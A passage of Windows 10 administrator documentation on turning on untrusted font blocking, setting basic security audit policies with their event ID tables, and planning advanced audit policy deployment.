the website might render differently.
Using desktop Office to look at documents with embedded fonts. In this situation, content shows up using a
default font picked by Office.
Turn on and use the Blocking Untrusted Fonts feature

Use Group Policy or the registry to turn this feature on, off, or to use audit mode.
To turn on and use the Blocking Untrusted Fonts feature through Group Policy
1. Open the Group Policy editor (gpedit.msc) and go to
Computer Configuration\Administrative Templates\System\Mitigation Options\Untrusted Font Blocking .
2. Click Enabled to turn the feature on, and then click one of the following Migitation Options:
Block untrusted fonts and log events. Turns the feature on, blocking untrusted fonts and logging
installation attempts to the event log.
Do not block untrusted fonts. Turns the feature on, but doesn't block untrusted fonts nor does it
log installation attempts to the event log.
Log events without blocking untrusted fonts. Turns the feature on, logging installation attempts
to the event log, but not blocking untrusted fonts.
3. Click OK.
To turn on and use the Blocking Untrusted Fonts feature through the registry To turn this feature on, off, or
to use audit mode:
1. Open the registry editor (regedit.exe) and go to
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel\ .
2. If the MitigationOptions key isn't there, right-click and add a new QWORD (64-bit) Value, renaming it to
MitigationOptions.
3. Right click on the MitigationOptions key, and then click Modify.
The Edit QWORD (64-bit) Value box opens.
4. Make sure the Base option is Hexadecimal, and then update the Value data, making sure you keep your
existing value, like in the important note below:
To turn this feature on. Type 1000000000000.
To turn this feature off. Type 2000000000000.
To audit with this feature. Type 3000000000000.
IMPORTANT
Your existing MitigationOptions values should be saved during your update. For example, if the current
value is 1000, your updated value should be 1000000001000.
5. Restart your computer.
View the event log

After you turn this feature on, or start using Audit mode, you can look at your event logs for details.
To look at your event log
1. Open the event viewer (eventvwr.exe) and go to Application and Service
Logs/Microsoft/Windows/Win32k/Operational.
2. Scroll down to EventID: 260 and review the relevant events.
Event Example 1 - MS Word
WINWORD.EXE attempted loading a font that is restricted by font-loading policy.
FontType: Memory
FontPath:
Blocked: true
NOTE
Because the FontType is Memory, there’s no associated FontPath.
Event Example 2 - Winlogon

Winlogon.exe attempted loading a font that is restricted by font-loading policy.
FontType: File
FontPath: \??\C:\PROGRAM FILES (X86)\COMMON FILES\MICROSOFT SHARED\EQUATION\MTEXTRA.TTF
Blocked: true
NOTE
Because the FontType is File, there’s also an associated FontPath.
Event Example 3 - Internet Explorer running in Audit mode

Iexplore.exe attempted loading a font that is restricted by font-loading policy.
FontType: Memory
FontPath:
Blocked: false
NOTE
In Audit mode, the problem is recorded, but the font isn’t blocked.
Fix apps having problems because of blocked fonts

Your company may still need apps that are having problems because of blocked fonts, so we suggest that you first
run this feature in Audit mode to determine which fonts are causing the problems.
After you figure out the problematic fonts, you can try to fix your apps in 2 ways: by directly installing the fonts into
the %windir%/Fonts directory or by excluding the underlying processes and letting the fonts load. As the default
solution, we highly recommend that you install the problematic font. Installing fonts is safer than excluding apps
because excluded apps can load any font, trusted or untrusted.
To fix your apps by installing the problematic fonts (recommended)
On each computer with the app installed, right-click on the font name and click Install.
The font should automatically install into your %windir%/Fonts directory. If it doesn’t, you’ll need to
manually copy the font files into the Fonts directory and run the installation from there.
To fix your apps by excluding processes
1. On each computer with the app installed, open regedit.exe and go to
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
<process_image_name>
.
For example, if you want to exclude Microsoft Word processes, you’d use
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Winword.exe .
2. Add any additional processes that need to be excluded here, and then turn the Blocking untrusted fonts
feature on, using the steps in the Turn on and use the Blocking Untrusted Fonts feature section of this topic.
Related content
Dropping the “Untrusted Font Blocking” setting
Security auditing
Applies to
Windows 10
Topics in this section are for IT professionals and describes the security auditing features in Windows and how
your organization can benefit from using these technologies to enhance the security and manageability of your
network.
Security auditing is one of the most powerful tools that you can use to maintain the integrity of your system. As
part of your overall security strategy, you should determine the level of auditing that is appropriate for your
environment. Auditing should identify attacks (successful or not) that pose a threat to your network, and attacks
against resources that you have determined to be valuable in your risk assessment.
In this section
TOPIC DESCRIPTION
Basic security audit policies Before you implement auditing, you must decide on an
auditing policy. A basic audit policy specifies categories of
security-related events that you want to audit. When this
version of Windows is first installed, all auditing categories are
disabled. By enabling various auditing event categories, you
can implement an auditing policy that suits the security needs
Advanced security audit policies Advanced security audit policy settings are found in Security
Settings\Advanced Audit Policy Configuration\System
Audit Policies and appear to overlap with basic security audit
policies, but they are recorded and applied differently.
Basic security audit policies
Applies to
Windows 10
Before you implement auditing, you must decide on an auditing policy. A basic audit policy specifies categories of
security-related events that you want to audit. When this version of Windows is first installed, all auditing
categories are disabled. By enabling various auditing event categories, you can implement an auditing policy that
suits the security needs of your organization.
The event categories that you can choose to audit are:
Audit logon events
Audit object access
Audit policy change
Audit privilege use
Audit system events
If you choose to audit access to objects as part of your audit policy, you must enable either the audit directory
service access category (for auditing objects on a domain controller), or the audit object access category (for
auditing objects on a member server or workstation). Once you have enabled the object access category, you can
specify the types of access you want to audit for each group or user.
In this section
TOPIC DESCRIPTION
Create a basic audit policy for an event category By defining auditing settings for specific event categories, you
can create an auditing policy that suits the security needs of
your organization. On devices that are joined to a domain,
auditing settings for the event categories are undefined by
default. On domain controllers, auditing is turned on by
default.
Apply a basic audit policy on a file or folder You can apply audit policies to individual files and folders on
your computer by setting the permission type to record
successful access attempts or failed access attempts in the
security log.
View the security event log The security log records each event as defined by the audit
policies you set on each object.
Basic security audit policy settings Basic security audit policy settings are found under Computer
Configuration\Windows Settings\Security Settings\Local
Policies\Audit Policy.
Create a basic audit policy for an event category
Applies to
Windows 10
By defining auditing settings for specific event categories, you can create an auditing policy that suits the security
needs of your organization. On devices that are joined to a domain, auditing settings for the event categories are
undefined by default. On domain controllers, auditing is turned on by default.
To complete this procedure, you must be logged on as a member of the built-in Administrators group.
To define or modify auditing policy settings for an event category for your local computer
1. Open the Local Security Policy snap-in (secpol.msc), and then click Local Policies.
2. Click Audit Policy.
3. In the results pane, double-click an event category that you want to change the auditing policy settings for.
4. Do one or both of the following, and then click OK.
To audit successful attempts, select the Success check box.
To audit unsuccessful attempts, select the Failure check box.
To complete this procedure, you must be logged on as a member of the Domain Admins group.
To define or modify auditing policy settings for an event category for a domain or organizational unit,
when you are on a member server or on a workstation that is joined to a domain
1. Open the Group Policy Management Console (GPMC ).
2. In the console tree, double-click Group Policy objects in the forest and domain containing the Default
Domain Policy Group Policy object (GPO ) that you want to edit.
3. Right-click the Default Domain Policy GPO, and then click Edit.
4. In the GPMC, go to Computer Configuration, Windows Settings, Security Settings, and then click Audit
Policy.
5. In the results pane, double-click an event category that you want to change the auditing policy settings for.
6. If you are defining auditing policy settings for this event category for the first time, select the Define these
policy settings check box.
7. Do one or both of the following, and then click OK.
To audit successful attempts, select the Success check box.
To audit unsuccessful attempts, select the Failure check box.
Additional considerations
To audit object access, enable auditing of the object access event category by following the steps above. Then,
enable auditing on the specific object.
After your audit policy is configured, events will be recorded in the Security log. Open the Security log to view
these events.
The default auditing policy setting for domain controllers is No Auditing. This means that even if auditing is
enabled in the domain, the domain controllers do not inherit auditing policy locally. If you want domain auditing
policy to apply to domain controllers, you must modify this policy setting.
Apply a basic audit policy on a file or folder
Applies to
Windows 10
You can apply audit policies to individual files and folders on your computer by setting the permission type to
record successful access attempts or failed access attempts in the security log. To complete this procedure, you
must be logged on as a member of the built-in Administrators group or you must have been granted the Manage
auditing and security log right.
To apply or modify auditing policy settings for a local file or folder
1. Right-click the file or folder that you want to audit, click Properties, and then click the Security tab.
2. Click Advanced.
3. In the Advanced Security Settings dialog box, click the Auditing tab, and then click Continue.
4. Do one of the following:
To set up auditing for a new user or group, click Add. Click Select a principal, type the name of the user
or group that you want, and then click OK.
To remove auditing for an existing group or user, click the group or user name, click Remove, click OK,
and then skip the rest of this procedure.
To view or change auditing for an existing group or user, click its name, and then click Edit.
5. In the Type box, indicate what actions you want to audit by selecting the appropriate check boxes:
To audit successful events, click Success.
To audit failure events, click Fail.
To audit all events, click All.
Important: Before setting up auditing for files and folders, you must enable object access auditing by defining
auditing policy settings for the object access event category. If you do not enable object access auditing, you
will receive an error message when you set up auditing for files and folders, and no files or folders will be
audited.
Additional considerations
After object access auditing is enabled, view the security log in Event Viewer to review the results of your
changes.
You can set up file and folder auditing only on NTFS drives.
Because the security log is limited in size, select the files and folders to be audited carefully. Also, consider the
amount of disk space that you want to devote to the security log. The maximum size for the security log is
defined in Event Viewer.
View the security event log
Applies to
Windows 10
The security log records each event as defined by the audit policies you set on each object.
To view the security log
1. Open Event Viewer.
2. In the console tree, expand Windows Logs, and then click Security. The results pane lists individual security
events.
3. If you want to see more details about a specific event, in the results pane, click the event.
Applies to
Windows 10
Basic security audit policy settings are found under Computer Configuration\Windows Settings\Security
Settings\Local Policies\Audit Policy.
In this section
TOPIC DESCRIPTION
Audit account logon events Determines whether to audit each instance of a user logging
on to or logging off from another device in which this device
is used to validate the account.
Audit account management Determines whether to audit each event of account

management on a device.
Audit directory service access Determines whether to audit the event of a user accessing an
Active Directory object that has its own system access control
list (SACL) specified.
Audit logon events Determines whether to audit each instance of a user logging
on to or logging off from a device.
Audit object access Determines whether to audit the event of a user accessing an
object--for example, a file, folder, registry key, printer, and so
forth--that has its own system access control list (SACL)
specified.
Audit policy change Determines whether to audit every incident of a change to

user rights assignment policies, audit policies, or trust policies.
Audit privilege use Determines whether to audit each instance of a user

exercising a user right.
Audit process tracking Determines whether to audit detailed tracking information for
events such as program activation, process exit, handle
duplication, and indirect object access.
Audit system events Determines whether to audit when a user restarts or shuts
down the computer or when an event occurs that affects
either the system security or the security log.
Related topics
Applies to
Windows 10
Determines whether to audit each instance of a user logging on to or logging off from another device in which this
device is used to validate the account.
This security setting determines whether to audit each instance of a user logging on to or logging off from another
computer in which this computer is used to validate the account. Account logon events are generated when a
domain user account is authenticated on a domain controller. The event is logged in the domain controller's
security log. Logon events are generated when a local user is authenticated on a local computer. The event is
logged in the local security log. Account logoff events are not generated.
If you define this policy setting, you can specify whether to audit successes, audit failures, or not audit the event
type at all. Success audits generate an audit entry when an account logon attempt succeeds. Failure audits
generate an audit entry when an account logon attempt fails. To set this value to No auditing, in the Properties
dialog box for this policy setting, select the Define these policy settings check box and clear the Success and
Failure check boxes.
Default: Success
Configure this audit setting

You can configure this security setting by opening the appropriate policy under Computer Configuration\Windows
Settings\Security Settings\Local Policies\Audit Policy.
LOGON EVENTS DESCRIPTION
672 An authentication service (AS) ticket was successfully issued

and validated.
673 A ticket granting service (TGS) ticket was granted.
674 A security principal renewed an AS ticket or TGS ticket.
675 Preauthentication failed. This event is generated on a Key

Distribution Center (KDC) when a user types in an incorrect
password.
676 Authentication ticket request failed. This event is not

generated in Windows XP or in the Windows Server 2003
family.
677 A TGS ticket was not granted. This event is not generated in
Windows XP or in the Windows Server 2003 family.
678 An account was successfully mapped to a domain account.

681 Logon failure. A domain account logon was attempted. This

event is not generated in Windows XP or in the Windows
Server 2003 family.
682 A user has reconnected to a disconnected terminal server

session.
683 A user disconnected a terminal server session without logging

off.
Related topics
Applies to
Windows 10
Determines whether to audit each event of account management on a device.
Examples of account management events include:
A user account or group is created, changed, or deleted.
A user account is renamed, disabled, or enabled.
A password is set or changed.
type at all. Success audits generate an audit entry when any account management event succeeds. Failure audits
generate an audit entry when any account management event fails. To set this value to No auditing, in the
Properties dialog box for this policy setting, select the Define these policy settings check box and clear the
Success and Failure check boxes.
Default:
Success on domain controllers.
No auditing on member servers.

ACCOUNT MANAGEMENT EVENTS DESCRIPTION
624 A user account was created.
627 A user password was changed.
628 A user password was set.
630 A user account was deleted.
631 A global group was created.
632 A member was added to a global group.
633 A member was removed from a global group.
634 A global group was deleted.
635 A new local group was created.

636 A member was added to a local group.
637 A member was removed from a local group.
638 A local group was deleted.
639 A local group account was changed.
641 A global group account was changed.
642 A user account was changed.
643 A domain policy was modified.
644 A user account was auto locked.
645 A computer account was created.
646 A computer account was changed.
647 A computer account was deleted.
648 A local security group with security disabled was created.

Note: SECURITY_DISABLED in the formal name means that
this group cannot be used to grant permissions in access
checks.
649 A local security group with security disabled was changed.
650 A member was added to a security-disabled local security

group.
651 A member was removed from a security-disabled local security

group.
652 A security-disabled local group was deleted.
653 A security-disabled global group was created.
645 A security-disabled global group was changed.
655 A member was added to a security-disabled global group.
656 A member was removed from a security-disabled global

group.
657 A security-disabled global group was deleted.
658 A security-enabled universal group was created.
659 A security-enabled universal group was changed.

660 A member was added to a security-enabled universal group.
661 A member was removed from a security-enabled universal

group.
662 A security-enabled universal group was deleted.
663 A security-disabled universal group was created.
664 A security-disabled universal group was changed.
665 A member was added to a security-disabled universal group.
666 A member was removed from a security-disabled universal

group.
667 A security-disabled universal group was deleted.
668 A group type was changed.
684 Set the security descriptor of members of administrative

groups.
685 Set the security descriptor of members of administrative

groups.
Note: Every 60 minutes on a domain controller a background
thread searches all members of administrative groups (such as
domain, enterprise, and schema administrators) and applies a
fixed security descriptor on them. This event is logged.
Related topics
Applies to
Windows 10
Determines whether to audit the event of a user accessing an Active Directory object that has its own system
access control list (SACL ) specified.
By default, this value is set to no auditing in the Default Domain Controller Group Policy object (GPO ), and it
remains undefined for workstations and servers where it has no meaning.
type at all. Success audits generate an audit entry when a user successfully accesses an Active Directory object that
has a SACL specified. Failure audits generate an audit entry when a user unsuccessfully attempts to access an
Active Directory object that has a SACL specified. To set this value to No auditing, in the Properties dialog box
for this policy setting, select the Define these policy settings check box and clear the Success and Failure check
boxes.
Note: You can set a SACL on an Active Directory object by using the Security tab in that object's Properties
dialog box. This is the same as Audit object access, except that it applies only to Active Directory objects and
not to file system and registry objects.
Default:
Undefined for a member server.

You can configure this security setting under Computer Configuration\Windows Settings\Security Settings\Local
There is only one directory service access event, which is identical to the Object Access security event message
566.
DIRECTORY SERVICE ACCESS EVENTS DESCRIPTION
566 A generic object operation took place.
Related topics
Audit logon events
Applies to
Windows 10
Determines whether to audit each instance of a user logging on to or logging off from a device.
Account logon events are generated on domain controllers for domain account activity and on local devices for
local account activity. If both account logon and logon audit policy categories are enabled, logons that use a
domain account generate a logon or logoff event on the workstation or server, and they generate an account logon
event on the domain controller. Additionally, interactive logons to a member server or workstation that use a
domain account generate a logon event on the domain controller as the logon scripts and policies are retrieved
when a user logs on. For more info about account logon events, see Audit account logon events.
type at all. Success audits generate an audit entry when a logon attempt succeeds. Failure audits generate an audit
entry when a logon attempt fails.
To set this value to No auditing, in the Properties dialog box for this policy setting, select the Define these
policy settings check box and clear the Success and Failure check boxes.
For information about advanced security policy settings for logon events, see the Logon/logoff section in
Advanced security audit policy settings.

528 A user successfully logged on to a computer. For information

about the type of logon, see the Logon Types table below.
529 Logon failure. A logon attempt was made with an unknown

user name or a known user name with a bad password.
530 Logon failure. A logon attempt was made user account tried
to log on outside of the allowed time.
531 Logon failure. A logon attempt was made using a disabled

account.
532 Logon failure. A logon attempt was made using an expired

account.
533 Logon failure. A logon attempt was made by a user who is not
allowed to log on at this computer.
534 Logon failure. The user attempted to log on with a type that is
not allowed.
535 Logon failure. The password for the specified account has
expired.
536 Logon failure. The Net Logon service is not active.
537 Logon failure. The logon attempt failed for other reasons.
538 The logoff process was completed for a user.
539 Logon failure. The account was locked out at the time the
logon attempt was made.
540 A user successfully logged on to a network.
541 Main mode Internet Key Exchange (IKE) authentication was

completed between the local computer and the listed peer
identity (establishing a security association), or quick mode
has established a data channel.
542 A data channel was terminated.
543 Main mode was terminated.
544 Main mode authentication failed because the peer did not
provide a valid certificate or the signature was not validated.
545 Main mode authentication failed because of a Kerberos failure

or a password that is not valid.
546 IKE security association establishment failed because the peer

sent a proposal that is not valid. A packet was received that
contained data that is not valid.
547 A failure occurred during an IKE handshake.
548 Logon failure. The security ID (SID) from a trusted domain

does not match the account domain SID of the client.
549 Logon failure. All SIDs corresponding to untrusted

namespaces were filtered out during an authentication across
forests.
550 Notification message that could indicate a possible denial-of-

service attack.
551 A user initiated the logoff process.
552 A user successfully logged on to a computer using explicit

credentials while already logged on as a different user.
682 A user has reconnected to a disconnected terminal server

session.
683 A user disconnected a terminal server session without logging

off.
When event 528 is logged, a logon type is also listed in the event log. The following table describes each logon
type.
LOGON TYPE LOGON TITLE DESCRIPTION
2 Interactive A user logged on to this computer.
3 Network A user or computer logged on to this

computer from the network.
4 Batch Batch logon type is used by batch

servers, where processes may be
executing on behalf of a user without
their direct intervention.
5 Service A service was started by the Service

Control Manager.
7 Unlock This workstation was unlocked.
8 NetworkCleartext A user logged on to this computer from

the network. The user's password was
passed to the authentication package in
its unhashed form. The built-in
authentication packages all hash
credentials before sending them across
the network. The credentials do not
traverse the network in plaintext (also
called cleartext).
9 NewCredentials A caller cloned its current token and

specified new credentials for outbound
connections. The new logon session has
the same local identity, but uses
different credentials for other network
connections.
10 RemoteInteractive A user logged on to this computer

remotely using Terminal Services or
Remote Desktop.
11 CachedInteractive A user logged on to this computer with

network credentials that were stored
locally on the computer. The domain
controller was not contacted to verify
the credentials.
Related topics
Audit object access
Applies to
Windows 10
Determines whether to audit the event of a user accessing an object--for example, a file, folder, registry key,
printer, and so forth--that has its own system access control list (SACL ) specified.
type at all. Success audits generate an audit entry when a user successfully accesses an object that has an
appropriate SACL specified. Failure audits generate an audit entry when a user unsuccessfully attempts to access
an object that has a SACL specified.
To set this value to No auditing, in the Properties dialog box for this policy setting, select the Define these policy
settings check box and clear the Success and Failure check boxes.
Note: You can set a SACL on a file system object using the Security tab in that object's Properties dialog
box.
Default: No auditing.

You can configure this security setting by opening the appropriate policy under Computer
Configuration\Windows Settings\Security Settings\Local Policies\Audit Policy.
OBJECT ACCESS EVENTS DESCRIPTION
560 Access was granted to an already existing object.
562 A handle to an object was closed.
563 An attempt was made to open an object with the intent to

delete it.
**Note: ** This is used by file systems when the
FILE_DELETE_ON_CLOSE flag is specified in Createfile().
564 A protected object was deleted.
565 Access was granted to an already existing object type.
567 A permission associated with a handle was used.

**Note: ** A handle is created with certain granted
permissions (Read, Write, and so on). When the handle is
used, up to one audit is generated for each of the permissions
that was used.
568 An attempt was made to create a hard link to a file that is

being audited.
569 The resource manager in Authorization Manager attempted

to create a client context.
570 A client attempted to access an object.

Note: An event will be generated for every attempted
operation on the object.
571 The client context was deleted by the Authorization Manager

application.
572 The administrator manager initialized the application.
772 The certificate manager denied a pending certificate request.
773 Certificate Services received a resubmitted certificate request.
774 Certificate Services revoked a certificate.
775 Certificate Services received a request to publish the

certificate revocation list (CRL).
776 Certificate Services published the certificate revocation list

(CRL).
777 A certificate request extension was made.
778 One or more certificate request attributes changed.
779 Certificate Services received a request to shutdown.
780 Certificate Services backup started.
781 Certificate Services backup completed
782 Certificate Services restore started.
783 Certificate Services restore completed.
784 Certificate Services started.
785 Certificate Services stopped.
786 The security permissions for Certificate Services changed.
787 Certificate Services retrieved an archived key.
788 Certificate Services imported a certificate into its database.
789 The audit filter for Certificate Services changed.
790 Certificate Services received a certificate request.

791 Certificate Services approved a certificate request and issued a

certificate.
792 Certificate Services denied a certificate request.
793 Certificate Services set the status of a certificate request to

pending.
794 The certificate manager settings for Certificate Services

changed.
795 A configuration entry changed in Certificate Services.
796 A property of Certificate Services changed.
797 Certificate Services archived a key.
798 Certificate Services imported and archived a key.
799 Certificate Services published the CA certificate to Active

Directory.
800 One or more rows have been deleted from the certificate
database.
801 Role separation enabled.
Related topics
Audit policy change
Applies to
Windows 10
Determines whether to audit every incident of a change to user rights assignment policies, audit policies, or trust
policies.
type at all. Success audits generate an audit entry when a change to user rights assignment policies, audit policies,
or trust policies is successful. Failure audits generate an audit entry when a change to user rights assignment
policies, audit policies, or trust policies fails.
Default:

POLICY CHANGE EVENTS DESCRIPTION
608 A user right was assigned.
609 A user right was removed.
610 A trust relationship with another domain was created.
611 A trust relationship with another domain was removed.
612 An audit policy was changed.
613 An Internet Protocol security (IPSec) policy agent started.
614 An IPSec policy agent was disabled.
615 An IPSec policy agent changed.
616 An IPSec policy agent encountered a potentially serious failure.
617 A Kerberos policy changed.
618 Encrypted Data Recovery policy changed.

620 A trust relationship with another domain was modified.
621 System access was granted to an account.
622 System access was removed from an account.
623 Per user auditing policy was set for a user.
625 Per user audit policy was refreshed.
768 A collision was detected between a namespace element in one

forest and a namespace element in another forest.
Note When a namespace element in one forest overlaps a
namespace element in another forest, it can lead to ambiguity
in resolving a name belonging to one of the namespace
elements. This overlap is also called a collision. Not all
parameters are valid for each entry type. For example, fields
such as DNS name, NetBIOS name, and SID are not valid for
an entry of type 'TopLevelName'.
769 Trusted forest information was added.

Note: This event message is generated when forest trust
information is updated and one or more entries are added.
One event message is generated per added, deleted, or
modified entry. If multiple entries are added, deleted, or
modified in a single update of the forest trust information, all
the generated event messages have a single unique identifier
called an operation ID. This allows you to determine that the
multiple generated event messages are the result of a single
operation. Not all parameters are valid for each entry type. For
example, parameters such as DNS name, NetBIOS name and
SID are not valid for an entry of type "TopLevelName".
770 Trusted forest information was deleted.

771 Trusted forest information was modified.

805 The event log service read the security log configuration for a
session.
Related topics
Audit privilege use
Applies to
Windows 10
Determines whether to audit each instance of a user exercising a user right.
If you define this policy setting, you can specify whether to audit successes, audit failures, or not audit this type of
event at all. Success audits generate an audit entry when the exercise of a user right succeeds. Failure audits
generate an audit entry when the exercise of a user right fails.
Audits are not generated for use of the following user rights, even if success audits or failure audits are specified
for Audit privilege use. Enabling auditing of these user rights tend to generate many events in the security log
which may impede your computer's performance. To audit the following user rights, enable the
FullPrivilegeAuditing registry key.
Bypass traverse checking
Debug programs
Create a token object
Replace process level token
Generate security audits
Back up files and directories
Restore files and directories

PRIVILEGE USE EVENTS DESCRIPTION
576 Specified privileges were added to a user's access token.

Note: This event is generated when the user logs on.
577 A user attempted to perform a privileged system service

operation.
578 Privileges were used on an already open handle to a protected

object.
Related topics
Applies to
Windows 10
Determines whether to audit detailed tracking information for events such as program activation, process exit,
handle duplication, and indirect object access.
type at all. Success audits generate an audit entry when the process being tracked succeeds. Failure audits
generate an audit entry when the process being tracked fails.
Configure this security setting

PROCESS TRACKING EVENTS DESCRIPTION
592 A new process was created.
593 A process exited.
594 A handle to an object was duplicated.
595 Indirect access to an object was obtained.
596 A data protection master key was backed up.

Note: The master key is used by the CryptProtectData and
CryptUnprotectData routines, and Encrypting File System
(EFS). The master key is backed up each time a new one is
created. (The default setting is 90 days.) The key is usually
backed up to a domain controller.
597 A data protection master key was recovered from a recovery

server.
598 Auditable data was protected.
599 Auditable data was unprotected.
600 A process was assigned a primary token.
601 A user attempted to install a service.

PROCESS TRACKING EVENTS DESCRIPTION
602 A scheduler job was created.
Related topics
Audit system events
Applies to
Windows 10
Determines whether to audit when a user restarts or shuts down the computer or when an event occurs that
affects either the system security or the security log.
type at all. Success audits generate an audit entry when a logon attempt succeeds. Failure audits generate an audit
entry when a logon attempt fails.
Default:

512 Windows is starting up.
513 Windows is shutting down.
514 An authentication package was loaded by the Local Security

Authority.
515 A trusted logon process has registered with the Local Security
Authority.
516 Internal resources allocated for the queuing of security event

messages have been exhausted, leading to the loss of some
security event messages.
517 The audit log was cleared.
518 A notification package was loaded by the Security Accounts

Manager.
519 A process is using an invalid local procedure call (LPC) port in

an attempt to impersonate a client and reply or read from or
write to a client address space.
520 The system time was changed.

Note: This audit normally appears twice.
Related topics
Advanced security audit policies
Applies to
Windows 10
Advanced security audit policy settings are found in Security Settings\Advanced Audit Policy
Configuration\System Audit Policies and appear to overlap with basic security audit policies, but they are
recorded and applied differently. When you apply basic audit policy settings to the local computer by using the
Local Security Policy snap-in, you are editing the effective audit policy, so changes made to basic audit policy
settings will appear exactly as configured in Auditpol.exe. In Windows 7 and later, advanced security audit policies
can be controlled by using Group Policy.
In this section
TOPIC DESCRIPTION
Planning and deploying advanced security audit policies This topic for the IT professional explains the options that
security policy planners must consider and the tasks they
must complete to deploy an effective security audit policy in a
network that includes advanced security audit policies
Advanced security auditing FAQ This topic for the IT professional lists questions and answers
about understanding, deploying, and managing security audit
policies.
Using advanced security auditing options to monitor dynamic This guide explains the process of setting up advanced
access control objects security auditing capabilities that are made possible through
settings and events that were introduced in Windows 8 and
Advanced security audit policy settings This reference for IT professionals provides information about
the advanced audit policy settings that are available in
Windows and the audit events that they generate.
Planning and deploying advanced security audit
policies
Applies to
Windows 10
This topic for the IT professional explains the options that security policy planners must consider and the tasks
they must complete to deploy an effective security audit policy in a network that includes advanced security audit
policies.
Organizations invest a large portion of their information technology budgets on security applications and services,
such as antimalware software, firewalls, and encryption. But no matter how much security hardware or software
you deploy, how tightly you control the rights of users, or how carefully you configure security permissions on
your data, you should not consider the job complete unless you have a well-defined, timely auditing strategy to
track the effectiveness of your defenses and identify attempts to circumvent them.
To be well defined and timely, an auditing strategy must provide useful tracking data for an organization's most
important resources, critical behaviors, and potential risks. In a growing number of organizations, it must also
provide absolute proof that IT operations comply with corporate and regulatory requirements.
Unfortunately, no organization has unlimited resources to monitor every resource and activity on a network. If you
do not plan well, you will likely have gaps in your auditing strategy. However, if you try to audit every resource and
activity, you may find yourself with far too much monitoring data, including thousands of benign audit entries that
an analyst needs to sift through to identify the narrow set of entries that warrant closer examination. This could
cause delays or even prevent auditors from identifying suspicious activity. Thus, too much monitoring can leave an
organization as vulnerable as not enough monitoring.
Here are some features that can help you focus your effort:
Advanced audit policy settings. You can apply and manage detailed audit policy settings through Group
Policy.
"Reason for access" auditing. You can specify and identify the permissions that were used to generate a
particular object access security event.
Global object access auditing. You can define system access control lists (SACLs) for an entire computer file
system or registry.
To deploy these features and plan an effective security auditing strategy, you need to:
Identify your most critical resources and the most important activities that need to be tracked.
Identify the audit settings that can be used to track these activities.
Assess the advantages and potential costs associated with each.
Test these settings to validate your choices.
Develop plans for deploying and managing your audit policy.
About this guide

This document will guide you through the steps needed to plan a security auditing policy that uses Windows
auditing features. This policy must identify and address vital business needs, including:
Network reliability
Regulatory requirements
Protection of the organization's data and intellectual property
Users, including employees, contractors, partners, and customers
Client computers and applications
Servers and the applications and services running on those servers
The audit policy also must identify processes for managing audit data after it has been logged, including:
Collecting, evaluating, and reviewing audit data
Storing and (if required) disposing of audit data
By carefully planning, designing, testing, and deploying a solution based on your organization's business
requirements, you can provide the standardized functionality, security, and management control that your
organization needs.
Understanding the security audit policy design process

The process of designing and deploying a Windows security audit policy involves the following tasks, which are
described in greater detail throughout this document:
Identifying your Windows security audit policy deployment goals
This section helps define the business objectives that will guide your Windows security audit policy. It also
helps you define the resources, users, and computers that will be the focus of your security auditing.
Mapping the security audit policy to groups of users, computers, and resources in your organization
This section explains how to integrate security audit policy settings with domain Group Policy settings for
different groups of users, computers, and resources. In addition, if your network includes multiple versions
of Windows client and server operating systems, it also explains when to use basic audit policy settings and
when to use advanced security audit policy settings.
Mapping your security auditing goals to a security audit policy configuration
This section explains the categories of Windows security auditing settings that are available. It also identifies
individual Windows security auditing policy settings that can be of particular value to address auditing
scenarios.
Planning for security audit monitoring and management
This section helps you plan to collect, analyze, and store Windows audit data. Depending on the number of
computers and types of activity that you want to audit, Windows event logs can fill up quickly. In addition,
this section explains how auditors can access and aggregate event data from multiple servers and desktop
computers. It also explains how to address storage requirements, including how much audit data to store
and how it must be stored.
Deploying the security audit policy
This section provides recommendations and guidelines for the effective deployment of a Windows security
audit policy. Configuring and deploying Windows audit policy settings in a test lab environment can help
you confirm that the settings you have selected will produce the type of audit data you need. However, only
a carefully staged pilot and incremental deployments based on your domain and organizational unit (OU )
structure will enable you to confirm that the audit data you generate can be monitored and that it meets
your organization's audit needs.
Identifying your Windows security audit policy deployment goals
A security audit policy must support and be a critical and integrated aspect of an organization's overall security
design and framework.
Every organization has a unique set of data and network assets (such as customer and financial data and trade
secrets), physical resources (such as desktop computers, portable computers, and servers), and users (which can
include various internal groups such as finance and marketing, and external groups such as partners, customers,
and anonymous users on the website). Not all of these assets, resources, and users justify the cost of an audit. Your
task is to identify which assets, resources, and users provide the strongest justification for the focus of a security
audit.
To create your Windows security audit plan, begin by identifying:
The overall network environment, including the domains, OUs, and security groups.
The resources on the network, the users of those resources, and how those resources are being used.
Regulatory requirements.
Network environment
An organization's domain and OU structure provide a fundamental starting point for thinking about how to apply
a security audit policy because it likely provides a foundation of Group Policy Objects (GPOs) and logical grouping
of resources and activities that you can use to apply the audit settings that you choose. It is also likely that certain
portions of your domain and OU structure already provide logical groups of users, resources, and activities that
justify the time and resources needed to audit them. For information about how to integrate a security audit policy
with your domain and OU structure, see Mapping security audit policy to groups of users, computers, and
resources in your organization later in this document.
In addition to your domain model, you should also find out whether your organization creates and maintains a
systematic threat model. A good threat model can help you identify threats to key components in your
infrastructure, so you can define and apply audit settings that enhance the organization's ability to identify and
counter those threats.
Important: Including auditing within your organization's security plan also makes it possible to budget your
resources on the areas where auditing can achieve the most positive results.
For additional details about how to complete each of these steps and how to prepare a detailed threat model,
download the IT Infrastructure Threat Modeling Guide.
Data and resources
For data and resource auditing, you need to identify the most important types of data and resources (such as
patient records, accounting data, or marketing plans) that can benefit from the closer monitoring that Windows
auditing can provide. Some of these data resources might already be monitored through auditing features in
products such as Microsoft SQL Server and Exchange Server. If so, you may want to consider how Windows
auditing features can enhance the existing audit strategy. As with the domain and OU structure discussed
previously, security auditing should focus on your most critical resources. You also must consider how much audit
data you will be able to manage.
You can record if these resources have high business impact, medium business impact, or low business impact, the
cost to the organization if these data resources are accessed by unauthorized users, and the risk that this access
can pose to the organization. The type of access by users (such as Read, Modify, or Copy) can also pose different
levels of risk to an organization.
Increasingly, data access and use is governed by regulations, and a breach can result in severe penalties and a loss
in credibility for the organization. If regulatory compliance plays a role in how you manage your data, be sure to
also document this information.
The following table provides an example of a resource analysis for an organization.
SECURITY OR
ORGANIZATIONAL REGULATORY
RESOURCE CLASS WHERE STORED UNIT BUSINESS IMPACT REQUIREMENTS
Payroll data Corp-Finance-1 Accounting: High Financial integrity and

